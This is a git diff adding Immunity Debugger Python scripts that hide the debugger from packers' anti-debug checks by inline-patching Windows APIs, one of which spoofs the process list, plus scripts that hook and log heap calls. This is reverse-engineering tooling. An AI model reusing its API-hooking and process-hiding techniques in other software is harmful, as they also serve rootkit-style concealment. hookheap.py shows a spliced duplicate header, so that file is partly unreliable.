+ if (b == 0xFEEEFEEE) and (c == 0xFEEEFEEE):
+ imm.writeLong(a, 0)
+ imm.writeLong(a + 4, 0)
+ a += 7
+ except:
+ break
+
+
+#-------------------------------------------------------------------------------
+# IsDebuggerPresent ..
+# Note: This Api checks a value in PEB, so if patching PEB then no need to patch Api ..
+
+def Patch_IsDebuggerPresent(imm):
+ ispresent = imm.getAddress( "kernel32.IsDebuggerPresent" )
+ # Just incase .. ;)
+ if (ispresent <= 0):
+ imm.Log( "No IsDebuggerPresent to patch .." )
+ return
+
+ imm.Log( "Patching IsDebuggerPresent...", address = ispresent )
+ Code = imm.Assemble("DB 0x64\n Mov EAX, DWORD PTR DS:[18]") + Poly_Return0(imm) + imm.Assemble( "ret" )
+ # Careful for Win2k ..
+ while len(Code) > 0x0E:
+ Code = imm.Assemble("DB 0x64\n Mov EAX, DWORD PTR DS:[18]") + Poly_Return0(imm) + imm.Assemble( "ret" )
+ imm.writeMemory( ispresent, Code )
+
+
+#-------------------------------------------------------------------------------
+# CheckRemoteDebuggerPresent ..
+# Note: This Api calls ZwQueryInformationProcess Api, so usually no need to patch both ..
+
+def Patch_CheckRemoteDebuggerPresent(imm):
+ deb = imm.getAddress( "kernel32.CheckRemoteDebuggerPresent" )
+ # Just incase on Win2k .. ;)
+ if (deb <= 0):
+ imm.Log( "No CheckRemoteDebuggerPresent to patch .." )
+ return
+
+ imm.Log( "Patching CheckRemoteDebuggerPresent ..", address = deb )
+ imm.writeMemory( deb, imm.Assemble( " \
+ Mov EDI, EDI \n \
+ Push EBP \n \
+ Mov EBP, ESP \n \
+ Mov EAX, [EBP + C] \n \
+ Push 0 \n \
+ Pop [EAX] \n \
+ Xor EAX, EAX \n \
+ Pop EBP \n \
+ Ret 8 \
+ " ) )
+
+
+#-------------------------------------------------------------------------------
+# ZwQueryInformationProcess ..
+
+def Patch_ZwQueryInformationProcess(imm):
+ qip = imm.getAddress( "ntdll.ZwQueryInformationProcess" )
+ # Just incase .. ;)
+ if (qip <= 0):
+ imm.Log( "No ZwQueryInformationProcess to patch .." )
+ return
+
+ imm.Log( "Patching ZwQueryInformationProcess ..", address = qip )
+ IsPatched = False
+ a = 0
+ s = 0
+ # Scan Api and get size of first 2 instructions ..
+ # On Win2k SysCall starts with Mov EAX, xxxxxxxx\n Lea EDX, [ESP + 4] ..
+ # On WinXP, Win2k3 + Vista, SysCall always starts with Mov EAX, xxxxxxxx\n MOV EDX, 0x7FFE0300 ..
+ while a < 2:
+ a += 1
+ s += imm.disasmSizeOnly(qip + s).opsize
+
+ # Check if already patched ..
+ FakeCode = imm.readMemory(qip, 1) + imm.Assemble("DD 0x12345678") + imm.readMemory(qip + 5, 1)
+ if FakeCode == imm.Assemble( "Push 0x12345678\n Ret"):
+ # Definately found a push jump ..
+ IsPatched = True
+ # Get address of where it points to ..
+ a = imm.readLong(qip + 1)
+ # Get length of the 2 instructions before patch code ..
+ i = 0
+ s = 0
+ while i < 2:
+ i += 1
+ s += imm.disasmSizeOnly(a + s).opsize
+
+ # If not patched already, allocate some memory for patch code ..
+ if IsPatched == False:
+ # Allocate memory for hook code ..
+ a = imm.remoteVirtualAlloc(size=0x1000)
+ # Write 2 instructions from api to allocated mem ..
+ imm.writeMemory( a, imm.readMemory(qip, s) )
+
+ # If ProcessInformationClass = ProcessDebugPort then return 0 in
+ # ProcessInformation; else call ZwQueryInformationProcess as normal ..
+ PatchCode = " \
+ Cmp DWord [ESP + 8], 7 \n \
+ DB 0x74, 0x06 \n \
+ \n \
+ Push 0x%08X \n \
+ Ret \n \
+ \n \
+ Mov EAX, DWord [ESP + 0x0C] \n \
+ Push 0 \n \
+ Pop [EAX] \n \
+ Xor EAX, EAX \n \
+ Ret 14 \n \
+ " % (qip + s)
+
+ # Write patch code in allocated memory after the original first 2 instructions ..
+ imm.writeMemory( a + s, imm.Assemble( PatchCode ) )
+
+ # If not patched, write Push Jmp to redirect Api to my code ..
+ if IsPatched == False:
+ imm.writeMemory( qip, imm.Assemble( "Push 0x%08X\n Ret" % a) )
+
+
+#-------------------------------------------------------------------------------
+# GetTickCount ..
+# Poly return cos it's an obvious one for a packer to check for Mov EAX, xxxxxxxx or Xor EAX, EAX ..
+
+def Patch_GetTickCount(imm):
+ a = imm.getAddress("kernel32.GetTickCount")
+ # Just incase .. ;)
+ if (a <= 0):
+ imm.Log( "No GetTickCount to patch .." )
+ return
+
+ imm.Log("Patching GetTickCount ..", address = a)
+
+ # Keep first instruction to avoid checks ..
+ Code = imm.Assemble("Mov EDX, 0x7FFE0000") + Poly_ReturnDW(imm, 0xB0B1560D) + imm.Assemble("Ret")
+ # Careful of Win2k's lack of alignment ..
+ while len(Code) > 0x0F:
+ Code = imm.Assemble("Mov EDX, 0x7FFE0000") + Poly_ReturnDW(imm, 0xB0B1560D) + imm.Assemble("Ret")
+
+ imm.writeMemory( a, Code )
+
+
+#-------------------------------------------------------------------------------
+# ImmunityDbg.Exe Process detection Patches ..
+#-------------------------------------------------------------------------------
+
+#-------------------------------------------------------------------------------
+# ZwQuerySystemInformation ..
+# If called with size < needed size then just returns size ..
+# If called with size >= needed size then fills buffer with list of all processes and lots of info about them ..
+
+def Patch_ZwQuerySystemInformation(imm):
+ qsi = imm.getAddress( "ntdll.ZwQuerySystemInformation" )
+ # Just incase .. ;)
+ if (qsi <= 0):
+ imm.Log( "No ZwQuerySystemInformation to patch .." )
+ return
+
+ imm.Log("Patching ZwQuerySystemInformation ..", address = qsi)
+ IsPatched = False
+ a = 0
+ s = 0
+ # Scan Api and get size of first 3 instructions ..
+ # On Win2k thats: Mov EAX, xxxxxxxx\n Lea EDX, [ESP + 4]\n Int 0x2E ..
+ # On WinXP, Win2k3 + Vista thats: Mov EAX, xxxxxxxx\n MOV EDX, 0x7FFE0300\n Call [EDX] ..
+ # So patch code will call SysCall before doing anything else ..
+ while a < 3:
+ a += 1
+ s += imm.disasmSizeOnly(qsi + s).opsize
+
+ # Check if already patched ..
+ FakeCode = imm.readMemory(qsi, 1) + imm.Assemble("DD 0x12345678") + imm.readMemory(qsi + 5, 1)
+ if FakeCode == imm.Assemble( "Push 0x12345678\n Ret"):
+ # Definately found a push jump ..
+ IsPatched = True
+ # Get address of where it points to ..
+ a = imm.readLong(qsi + 1)
+ # Get length of the 3 instructions before patch code ..
+ i = 0
+ s = 0
+ while i < 3:
+ i += 1
+ s += imm.disasmSizeOnly(a + s).opsize
+
+ # If not patched already, allocate some memory for patch code ..
+ if IsPatched == False:
+ # Allocate memory for hook code ..
+ a = imm.remoteVirtualAlloc(size=0x1000)
+ # Write 3 instructions from api to allocated mem ..
+ imm.writeMemory( a, imm.readMemory(qsi, s) )
+
+ # If SystemInformationClass == SystemProcessesAndThreadsInformation then
+ # replace ImmunityDebugger.Exe with SVCHOST.EXE in returned process list .. :)
+ # There are no labels, so all jmps, calls etc are written as bytes ..
+ # Also, due to some weird bug LodsW assembles as LodsD so I put
+ # "DB 0x66\n LodsD" to force LodsW, and same for MovsW .. (should work after bug fix)
+
+ PatchCode = " \
+ \n\
+ Cmp EAX, 0 \n\
+ DB 0x74, 0x03 \n\
+ Ret 0x10 \n\
+ \n\
+ PushAD \n\
+ Mov EAX, [ESP + 0x24] \n\
+ Lea EBX, [ESP + 0x28] \n\
+ Mov ECX, [ESP + 0x2C] \n\
+ \n\
+ DB 0xE8 \n\
+ DD 0x2C \n\
+ DW 'I', 'M', 'M', 'U' \n\
+ DW 'N', 'I', 'T', 'Y' \n\
+ DW 'D', 'E', 'B', 'U' \n\
+ DW 'G', 'G', 'E', 'R' \n\
+ DW '.', 'E', 'X', 'E' \n\
+ DW 0x00,0x00 \n\
+ \n\
+ Pop EDI \n\
+ Cmp EAX, 5 \n\
+ DB 0x74, 0x04 \n\
+ PopAD \n\
+ Ret 0x10 \n\
+ \n\
+ Cmp ECX, 0 \n\
+ DB 0x74, 0xF4 \n\
+ Cmp EBX, 0 \n\
+ DB 0x74, 0xEC \n\
+ \n\
+ Mov EBX, [EBX] \n\
+ PushAD \n\
+ Xor EAX, EAX \n\
+ Mov ESI, [EBX + 0x3C] \n\
+ Cmp ESI, 0 \n\
+ DB 0x74, 0x0A \n\
+ DB 0x66 \n\
+ LodsD \n\
+ Cmp EAX, 0 \n\
+ DB 0x75, 0x0C \n\
+ \n\
+ Pop EDI \n\
+ Push EDI \n\
+ DB 0x8B, 0x03 \n\
+ Or EAX, EAX \n\
+ DB 0x74, 0x6F \n\
+ Add EBX, EAX \n\
+ DB 0xEB, 0xDA \n\
+ \n\
+ Cmp AL, 0x61 \n\
+ DB 0x7C, 0x03 \n\
+ Sub AL, 0x20 \n\
+ Cmp [EDI], AL \n\
+ DB 0x75, 0xE8 \n\
+ Inc EDI \n\
+ Inc EDI \n\
+ Cmp DWORD [EDI], 0 \n\
+ DB 0x75, 0xD4 \n\
+ \n\
+ Sub ESI, 0x28 \n\
+ \n\
+ DB 0xE8 \n\
+ DD 0x28 \n\
+ DW 'S', 'V', 'C', 'H' \n\
+ DW 'O', 'S', 'T', '.' \n\
+ DW 'E', 'X', 'E', 0x00 \n\
+ DD 0x00,0x00,0x00,0x00 \n\
+ \n\
+ XChg ESI, EDI \n\
+ Pop ESI \n\
+ Mov ECX, 0x14 \n\
+ DB 0x66 \n\
+ Rep MovsD \n\
+ \n\
+ Mov DWord [EBX + 0x40], 2 \n\
+ Mov DWord [EBX + 0x44], 0 \n\
+ DB 0xEB, 0x89 \n\
+ \n\
+ PopAD \n\
+ PopAD \n\
+ Ret 0x10 \n\
+ \
+ "
+
+ # Write patch code in allocated memory after the original first 3 instructions ..
+ imm.writeMemory( a + s, imm.Assemble( PatchCode ) )
+
+ # If not patched, write Push Jmp to redirect Api to my code ..
+ if IsPatched == False:
+ imm.writeMemory( qsi, imm.Assemble( "Push 0x%08X\n Ret" % a) )
+
+
+#-------------------------------------------------------------------------------
+# Window Detection Patches ..
+#-------------------------------------------------------------------------------
+
+#-------------------------------------------------------------------------------
+# Patch for FindWindowA, FindWindowW, FindWindowExA, FindWindowExW ..
+
+def Patch_FindWindow(imm, ex = False, suffix = "A"):
+ suffix = suffix.upper()
+
+ RetVal = 0x08
+ if ex:
+ suffix = "Ex" + suffix
+ RetVal = 0x10
+
+ FW = imm.getAddress("user32.FindWindow%s" % suffix)
+ # Just incase .. ;)
+ if (FW <= 0):
+ imm.Log("No FindWindow%s to patch .. (Is User32 Loaded?)" % suffix)
+ return False
+
+ # Find place for jmp in Api ..
+ p = 0
+ d = imm.disasm(FW)
+ l = d
+ dis = ""
+ FoundCall = False
+ while p < 100:
+ if d.getDisasm() == "POP EBP":
+ dis = l.getDisasm()
+ p -= l.getSize()
+ if l.isCall():
+ FoundCall = True
+ break
+ # Try to continue without expected call instrucion ..
+ dis = l.getDisasm()
+ break
+ # Did we already patch this api ?
+ if d.getDisasm() == "RETN":
+ if l.isPush():
+ imm.log("FindWindow%s already patched .." % suffix, address = FW)
+ return False
+ p += d.getSize()
+ l = d
+ d = imm.disasm(FW + p)
+
+ imm.Log("Patching FindWindow%s .." % suffix, address = FW)
+ HookMem = imm.remoteVirtualAlloc(size=0x1000)
+ HookCode = imm.Assemble("Push 0x%08X\n Ret" % HookMem)
+
+ if FoundCall == True:
+ # Get address pointed to by call instruction ..
+ a = l.getJmpAddr()
+ # Fix Call instruction in patch function to point to original call address ..
+ a = ((a - HookMem) - 5)
+ dis = "DB 0xE8\n DD 0x%08X" % a
+
+ # Get HWnd of ImmDbg .. If this is exposed by ImmLib, I didn't find it.. :)
+ ImmHWnd = ctypes.windll.LoadLibrary("User32.DLL").FindWindowA("ID", 0)
+
+ # Code calls Api, if HWnd matches ImmDbg return 0 ..
+ # Else all works as before ..
+ # Again, all jumps are as bytes cos no labels ..
+
+ PatchCode = " \
+ %s \n\
+ Cmp EAX, 0x%08X \n\
+ DB 0x74, 0x02 \n\
+ DB 0xEB, 0x02 \n\
+ Xor EAX, EAX \n\
+ Pop EBP \n\
+ Ret 0x%02X \n\
+ " % (dis, ImmHWnd, RetVal)
+
+ imm.writeMemory(HookMem, imm.Assemble(PatchCode))
+ imm.writeMemory(FW + p, HookCode)
+ return True
+
+
+#-------------------------------------------------------------------------------
+
+def Patch_EnumWindows(imm):
+ EW = imm.getAddress("user32.EnumWindows")
+ # Just incase .. ;)
+ if (EW <= 0):
+ imm.Log("No EnumWindows to patch .. (Is User32 Loaded?)")
+ return False
+
+ # Find place for jmp in Api ..
+ p = 0
+ d = imm.disasm(EW)
+ l = d
+ dis = ""
+ FoundCall = False
+ while p < 100:
+ if d.getDisasm() == "POP EBP":
+ dis = l.getDisasm()
+ p -= l.getSize()
+ if l.isCall():
+ FoundCall = True
+ break
+ # Try to continue without expected call instrucion ..
+ dis = l.getDisasm()
+ break
+ # Did we already patch this api ?
+ if d.getDisasm() == "RETN":
+ if l.isPush():
+ imm.log("EnumWindows already patched ..", address = EW)
+ return False
+ p += d.getSize()
+ l = d
+ d = imm.disasm(EW + p)
+
+ imm.Log("Patching EnumWindows ..", address = EW)
+ HookMem = imm.remoteVirtualAlloc(size=0x1000)
+ HookCode = imm.Assemble("Push 0x%08X\n Ret" % HookMem)
+
+ if FoundCall == True:
+ # Get address pointed to by call instruction ..
+ a = l.getJmpAddr()
+ # Fix Call instruction in patch function to point to original call address ..
+ a = ((a - (HookMem + 0x5B)) - 5) # 0x5B = offset of call instruction in patch code ..
+ dis = "DB 0xE8\n DD 0x%08X" % a
+
+ # Get HWnd of ImmDbg ..
+ ImmHWnd = ctypes.windll.LoadLibrary("User32.DLL").FindWindowA("ID", 0)
+
+ # Code calls Api, using own callback function ..
+ # My callback calls user's callback function (if hwnd not ImmDbg) ..
+ # Else all works as before ..
+ PatchCode = " \
+ DB 0xEB,0x31 \n\
+ \n\
+ Sub EAX, EAX \n\
+ Inc EAX \n\
+ PushAD \n\
+ DB 0x81,0x7C,0x24,0x24 \n\
+ DD 0x%08X \n\
+ DB 0x74,0x1B \n\
+ Push [ESP + 0x28] \n\
+ Push [ESP + 0x28] \n\
+ Call [0x0000002F] \n\
+ Mov [ESP + 0x1C], EAX \n\
+ PopAD \n\
+ Ret 8 \n\
+ \n\
+ DD 0xB0b1560d \n\
+ \n\
+ DB 0xE8 \n\
+ DD 0x00000000 \n\
+ Pop EAX \n\
+ Sub EAX, 0x38 \n\
+ Add [EAX + 0x20], EAX \n\
+ Push [EBP + 0x08] \n\
+ Pop [EAX + 0x2F] \n\
+ \n\
+ Inc EAX \n\
+ Inc EAX \n\
+ Push EAX \n\
+ Pop [ESP + 0x08] \n\
+ %s \n\
+ Pop EBP \n\
+ Ret 8 \n\
+ " % (ImmHWnd, dis)
+
+ imm.writeMemory(HookMem, imm.Assemble(PatchCode))
+ imm.writeMemory(EW + p, HookCode)
+ return True
+
+
+#-------------------------------------------------------------------------------
+# Main Function ..
+
+def main(args):
+ ptypes={
+ # Debug types
+ 'isdebuggerpresent':0, 'peb':1, 'checkremotedebuggerpresent':2,
+ 'zwqueryinformationprocess':3, 'gettickcount':4, 'all_debug':10,
+ # Process Types
+ 'zwquerysysteminformation':20, 'all_process':21,
+ # Window Types
+ 'findwindowa':30, 'findwindoww':31, 'findwindowexa':32, 'findwindowexw':33,
+ 'enumwindows':34, 'all_window':35,
+ # Packers (some example ones - of course many more are supported, add them as you find them)
+ 'upx-lock':100, 'nspack':101, 'exestealth':102, 'escargot':103, 'rlpack':104
+ }
+
+ imm = immlib.Debugger()
+
+ if not args:
+ usage(imm)
+ return "Error : No patch type .. See log window for usage (Alt-L) .."
+
+ ptype = args[0].lower()
+ if ptypes.has_key( ptype ):
+ ptype = ptypes[ ptype ]
+ else:
+ return "Invalid type: %s" % ptype
+
+ # Intro text ..
+ imm.Log(" ")
+ imm.Log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers), highlight=1)
+
+
+ # --------------------------------------------------------------------------
+
+ # IsDebuggerPresent ..
+ # If patch PEB then no need for this ..
+ if ptype == 0:
+ Patch_IsDebuggerPresent(imm)
+ return "IsDebuggerPresent patched .."
+
+ # PEB ..
+ elif ptype == 1:
+ Patch_PEB(imm)
+ return "PEB Flags patched .."
+
+ # CheckRemoteDebuggerPresent ..
+ # If patch ZwQueryInformationProcess then no need for this ..
+ elif ptype == 2:
+ Patch_CheckRemoteDebuggerPresent(imm)
+ return "CheckRemoteDebuggerPresent patched .."
+
+ # ZwQueryInformationProcess ..
+ elif ptype == 3:
+ Patch_ZwQueryInformationProcess(imm)
+ return "ZwQueryInformationProcess patched .."
+
+ # GetTickCount ..
+ elif ptype == 4:
+ Patch_GetTickCount(imm)
+ return "GetTickCount patched .."
+
+ # Patch all anti-debug / debug-detection Apis and flags ..
+ elif ptype == 10:
+ Patch_PEB(imm)
+ Patch_IsDebuggerPresent(imm)
+ Patch_CheckRemoteDebuggerPresent(imm)
+ Patch_ZwQueryInformationProcess(imm)
+ Patch_GetTickCount(imm)
+ return "All Anti-debug Apis and flags patched .."
+
+
+ # --------------------------------------------------------------------------
+ # ZwQuerySystemInformation ..
+ elif ptype == 20:
+ Patch_ZwQuerySystemInformation(imm)
+ return "ZwQuerySystemInformation patched .."
+
+ # Patch all Process Apis to not return ImmDbg.EXE ..
+ elif ptype == 21:
+ Patch_ZwQuerySystemInformation(imm)
+ return "All debugger process finding Apis patched .."
+
+
+ # --------------------------------------------------------------------------
+ # User32.DLL isn't always in memory, so these are done slightly differently ..
+
+ # FindWindowA ..
+ elif ptype == 30:
+ if Patch_FindWindow(imm) == True:
+ return "FindWindowA patched .."
+ return "FindWindowA not patched .."
+
+ # FindWindowW ..
+ elif ptype == 31:
+ if Patch_FindWindow(imm, "W") == True:
+ return "FindWindowW patched .."
+ return "FindWindowW not patched .."
+
+ # FindWindowExA ..
+ elif ptype == 32:
+ if Patch_FindWindow(imm, True) == True:
+ return "FindWindowExA patched .."
+ return "FindWindowExA not patched .."
+
+ # FindWindowExW ..
+ elif ptype == 33:
+ if Patch_FindWindow(imm, True, "W") == True:
+ return "FindWindowExW patched .."
+ return "FindWindowExW not patched .."
+
+ # EnumWindows ..
+ elif ptype == 34:
+ if Patch_EnumWindows(imm) == True:
+ return "EnumWindows patched .."
+ return "EnumWindows not patched .."
+
+ # All Window functions ..
+ elif ptype == 35:
+ a = True
+ b = Patch_FindWindow(imm)
+ if b == False:
+ a = b
+ b = Patch_FindWindow(imm, suffix = "W")
+ if b == False:
+ a = b
+ b = Patch_FindWindow(imm, True, "A")
+ if b == False:
+ a = b
+ b = Patch_FindWindow(imm, True, "W")
+ if b == False:
+ a = b
+ b = Patch_EnumWindows(imm)
+ if b == False:
+ a = b
+ if a:
+ return "All debugger Window finding Apis patched .."
+ return "Some Window Apis not patched .. See Log .."
+
+
+ # --------------------------------------------------------------------------
+
+ # Fix Anti-Debug of Upx-Lock ..
+ elif ptype == 100:
+ Patch_IsDebuggerPresent(imm)
+ Patch_GetTickCount(imm)
+ return "ImmDbg hidden from Upx-Lock .."
+
+ # Fix Anti-Debug of NsPack ..
+ elif ptype == 101:
+ Patch_PEB(imm)
+ return "ImmDbg hidden from NsPack .."
+
+ # Fix Anti-Debug of ExeStealth ..
+ elif ptype == 102:
+ Patch_PEB(imm)
+ return "ImmDbg hidden from ExeStealth .."
+
+ # Fix Anti-Debug of Escargot ..
+ elif ptype == 103:
+ Patch_IsDebuggerPresent(imm)
+ return "ImmDbg hidden from Escargot .."
+
+ # Fix Anti-Debug of RL!Pack (v1.18+ Still detects debug by guard page) ..
+ elif ptype == 104:
+ Patch_PEB(imm)
+ Patch_ZwQueryInformationProcess(imm)
+ Patch_EnumWindows(imm)
+ return "ImmDbg hidden from RL!Pack .."
+
+
diff --git a/1.73/PyCommands/hippie.py b/1.73/PyCommands/hippie.py
new file mode 100755
index 0000000..1638015
--- /dev/null
+++ b/1.73/PyCommands/hippie.py
@@ -0,0 +1,201 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+DESC="""Syscall Fuzzer"""
+
+import immlib
+import immutils
+import getopt
+
+# We need to find this specific place
+def getRet(imm, allocaddr, max_opcodes = 300):
+ addr = allocaddr
+
+ for a in range(0, max_opcodes):
+ op = imm.disasmForward( addr )
+ if op.isRet():
+ if op.getImmConst() == 0xc:
+ op = imm.disasmBackward( addr, 3)
+ return op.getAddress()
+ addr = op.getAddress()
+
+ return 0x0
+
+def usage( imm ):
+ imm.Log("!hippie -[o|s|d|p|c] InjectHook on Allocate/Free Heap", focus=1)
+ #imm.Log("-n Name Tag Name ")
+ imm.Log("-o Enable Hook")
+ imm.Log("-s Show Hook results")
+ imm.Log("-d Delete Hooks")
+ imm.Log("-p Pause Hook")
+ imm.Log("-C Clear Hook")
+ imm.Log("-c Continue Hook")
+ imm.Log("-h Filter by Heap")
+ imm.Log("-a Filter by Chunk Address")
+
+SWITCH = 1
+SHOW = 2
+DELETE = 3
+PAUSE = 4
+CONTINUE = 5
+CLEAR = 6
+
+def showresult(imm, a, rtlallocate, extra = ""):
+ if a[0] == rtlallocate:
+ imm.Log("RtlAllocateHeap(0x%08x, 0x%08x, 0x%08x) <- 0x%08x %s" % ( a[1][0], a[1][1], a[1][2], a[1][3], extra), address = a[1][3] )
+ else:
+ imm.Log("RtlFreeHeap(0x%08x, 0x%08x, 0x%08x) %s" % (a[1][0], a[1][1], a[1][2], extra) )
+
+
+def main(args):
+ imm = immlib.Debugger()
+
+ try:
+ opts, argo = getopt.getopt(args, "osdpch:a:C")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Argument (Check Log Window)"
+
+ FlagCmd = 0
+ heap = None
+ chunkaddress = None
+
+ for o,a in opts:
+ if o == '-o':
+ FlagCmd = SWITCH
+ elif o == '-s':
+ FlagCmd = SHOW
+ elif o == '-d':
+ FlagCmd = DELETE
+ elif o == '-p':
+ FlagCmd = PAUSE
+ elif o == '-c':
+ FlagCmd = CONTINUE
+ elif o == '-C':
+ FlagCmd = CLEAR
+ elif o == '-h':
+ heap = int(a, 16)
+ elif o == '-a':
+ chunkaddress = int(a, 16)
+
+ Name = "hippiehook"
+
+
+ if FlagCmd == SWITCH:
+ if imm.getKnowledge(Name):
+ usage(imm)
+ return "Cannot set Hooks: Hooks are already set"
+ imm.Pause()
+ rtlfree = imm.getAddress("ntdll.RtlFreeHeap")
+ allocate = imm.getAddress("ntdll.RtlAllocateHeap")
+ # We need to hook on the the ret point of RtlAllocateHeap so we can
+ # get the result of the allocation.
+ mod = imm.getModule("ntdll.dll")
+ if not mod.isAnalysed():
+ imm.analyseCode( mod.getCodebase() )
+ imm.Log("oOoo: 0x%08x" % allocate)
+ rtlallocate = getRet(imm, allocate, 1000)
+ imm.addKnowledge("FuncNames", ( rtlallocate, rtlfree ) )
+
+ imm.Log("0x%08x 0x%08x (0x%08x)" % (rtlallocate, rtlfree, allocate))
+
+ fast = immlib.STDCALLFastLogHook( imm )
+ imm.Log("Logging on Free 0x%08x" % rtlfree)
+ fast.logFunction( rtlfree, 3 )
+
+ imm.Log("Logging on Alloc 0x%08x" % rtlallocate)
+ fast.logFunction( rtlallocate, 0)
+ fast.logBaseDisplacement( "EBP", 8)
+ fast.logBaseDisplacement( "EBP", 0xC)
+ fast.logBaseDisplacement( "EBP", 0x10)
+ fast.logRegister( "EAX" )
+
+ # Manual Way to do it
+ #fast = immlib.FastLogHook( imm )
+ #imm.Log("Logging on 0x%08x" % rtlallocate)
+ #fast.logFunction( rtlallocate )
+ #fast.logBaseDisplacement("ESP", 4)
+ #fast.logBaseDisplacement("ESP", 8)
+ #fast.logBaseDisplacement("ESP", 12)
+ #fast.logRegister("EAX")
+
+ #fast.logFunction( rtlfree )
+ #imm.Log("Logging on 0x%08x" % rtlfree)
+ #fast.logBaseDisplacement("ESP", 4)
+ #fast.logBaseDisplacement("ESP", 8)
+ #fast.logBaseDisplacement("ESP", 12)
+
+ fast.Hook()
+ imm.addKnowledge(Name, fast, force_add = 1)
+
+ elif FlagCmd == DELETE:
+ fast = imm.getKnowledge( Name )
+ if not fast:
+ return "Couldn't find the name tag"
+ fast.unHook()
+ imm.forgetKnowledge( Name )
+ return "Hook removed: %s" % Name
+
+ elif FlagCmd == CLEAR:
+ fast = imm.getKnowledge(Name)
+ if not fast:
+ return "Couldn't find the name tag"
+ fast.Clear()
+ return "Hook has been clear"
+
+ elif FlagCmd == SHOW:
+ fast = imm.getKnowledge(Name)
+ if not fast:
+ return "Couldn't find the name tag"
+
+ rtlallocate, rtlfree = imm.getKnowledge("FuncNames")
+ ret = fast.getAllLog()
+ NDX = {rtlallocate: 3, rtlfree: 2}
+ for a in ret:
+ extra = ""
+ if heap:
+ if heap == a[1][0]:
+ if chunkaddress:
+ if a[1][ NDX[ a[0] ] ] == chunkaddress:
+ extra = "<---- * FOUND *"
+ showresult(imm, a, rtlallocate, extra)
+ #else:
+ # showresult(imm, a, rtlallocate)
+ else:
+ if chunkaddress:
+ if a[1][ NDX[ a[0] ] ] == chunkaddress:
+ extra = "<---- * FOUND *"
+
+ showresult(imm, a, rtlallocate, extra)
+ #else:
+ # showresult(imm, a, rtlallocate)
+
+ imm.Log("=" * 0x2f)
+ return "Traced %d functions" % len(ret)
+
+ elif FlagCmd == PAUSE:
+ fast = imm.getKnowledge(Name)
+ if not fast:
+ return "Couldn't find the name tag"
+ if not fast.Pause():
+ return "Error: not been able to pause %s hook " % Name
+ imm.addKnowledge(Name, fast, force_add = 1)
+ return "Hook %s paused" % Name
+
+ elif FlagCmd == CONTINUE:
+ fast = imm.getKnowledge(Name)
+ if not fast:
+ return "Couldn't find the name tag"
+ if not fast.Continue():
+ return "Error: not been able to continue %s hook " % Name
+ imm.addKnowledge(Name, fast, force_add = 1)
+ return "Hook %s continued" % Name
+
+ return "Done"
diff --git a/1.73/PyCommands/hookheap.py b/1.73/PyCommands/hookheap.py
new file mode 100755
index 0000000..0e6f90a
--- /dev/null
+++ b/1.73/PyCommands/hookheap.py
@@ -0,0 +1,154 @@
+#!/usr/bin/env python
+"""
+Hook on RtlAllocateHeap
+"""
+
+DESC = """Hook on RtlAllocateHeap/RtlFreeHeap and display information """
+import immlib
+from immlib import LogBpHook
+import getopt
+import struct
+
+# RtlAllocateHeap Hook class
+ALLOCLABEL = "Alloc Hook"
+class RtlAllocateHeapHook(LogBpHook):
+ def __init__(self, heap):
+ LogBpHook.__init__(self)
+ self.Heap = heap
+
+ def run(self,regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ #for a in regs:
+ #imm.Log("%s:%08x" % (a, regs[a]))
+ readaddr=""
+ size=""
+
+ res=imm.readMemory( regs['ESP'] + 4, 0xc)
+ if len(res) != 0xc:
+ imm.Log("RtlAllocateHeap: ESP seems to broken, unable to get args")
+ return 0x0
+ (heap, flags, size) = struct.unpack("LLL", res)
+ if heap == self.Heap:
+ imm.Log("RtlAllocateHeap(0x%08x, 0x%08x, 0x%08x)" % (heap, flags, size))
+
+# RtlFreeHeap Hook class
+FREELABEL = "Free Hook"
+class RtlFreeHeapHook(LogBpHook):
+ def __init__(self, heap):
+ LogBpHook.__init__(self)
+ self.Heap = heap
+
+ def run(self,regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ #for a in regs:
+ #imm.Log("%s:%08x" % (a, regs[a]))
+ readaddr=""
+ size=""
+
+ res=imm.readMemory( regs['ESP'] + 4, 0xc)
+ if len(res) != 0xc:
+ imm.Log("RtlFreeHeap: ESP seems to broken, unable to get args")
+ return 0x0
+ (heap, flags, size) = struct.unpack("LLL", res)
+ if heap == self.Heap:
+ imm.Log("RtlFreeHeap(0x%08x, 0x%08x, 0x%08x)" % (heap, flags, size))
+
+
+def usage(imm):
+ imm.Log("!hookalloc Hook on RtlAllocateHeap/RtlFreeHeap and display information")
+ imm.Log("-h Heap to hook")
+ imm.Log("-a Hook on RtlAllocateHeap")
+ imm.Log("-f Hook on RtlFreeHeap")
+ imm.Log("-u Disable Hooks")
+
+def HookOn(imm, heap, LABEL, HeapHook, bp_address, Disable):
+ hookalloc = imm.getKnowledge( LABEL + "_%08x" % heap )
+ if Disable:
+ if not hookalloc:
+ imm.Log("Error %s: No hook for heap 0x%08x to disable" % (LABEL, heap))
+ return "No %s to disable for heap 0x%08x" % (LABEL, heap)
+ else:
+ hookalloc.UnHook()
+ imm.Log("UnHooked %s" % LABEL)
+ imm.forgetKnowledge( LABEL + "_%08x" % heap )
+ return "%s for 0x%08x heap unhooked" % (LABEL, heap)
+ else:
+ if not hookalloc:
+ hookalloc= HeapHook( heap )
+ hookalloc.add( LABEL + "_%08x" % heap, bp_address)
+ imm.Log("Placed %s" % LABEL)
+ imm.addKnowledge( LABEL + "_%08x" % heap, hookalloc )
+ else:
+ imm.Log("HookAlloc for heap 0x%08x is already running" % heap)
+ return "Hooking on RtlAllocateHeap"
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+def main(args):
+ if not args:
+ return "No arguments given"
+
+ heap = None
+ Disable = False
+ AllocFlag = False
+ FreeFlag = False
+ imm = immlib.Debugger()
+
+ try:
+ opts, argo = getopt.getopt(args, "h:uaf")
+ except getopt.GetoptError:
+ imm.setStatusBar("Bad argument %s" % str(args))
+ usage(imm)
+ return 0
+
+ for o,a in opts:
+ if o == "-h" :
+ try:
+ heap = int(a, 16)
+ except ValueError, msg:
+ return "Invalid heap address: %s" % a
+ elif o == "-u" :
+ Disable = True
+ elif o == "-a":
+ AllocFlag = True
+ elif o == "-f":
+ FreeFlag = True
+
+ ret = ""
+
+ if heap:
+ if AllocFlag:
+ allocaddr = imm.getAddress("ntdll.RtlAllocateHeap" )
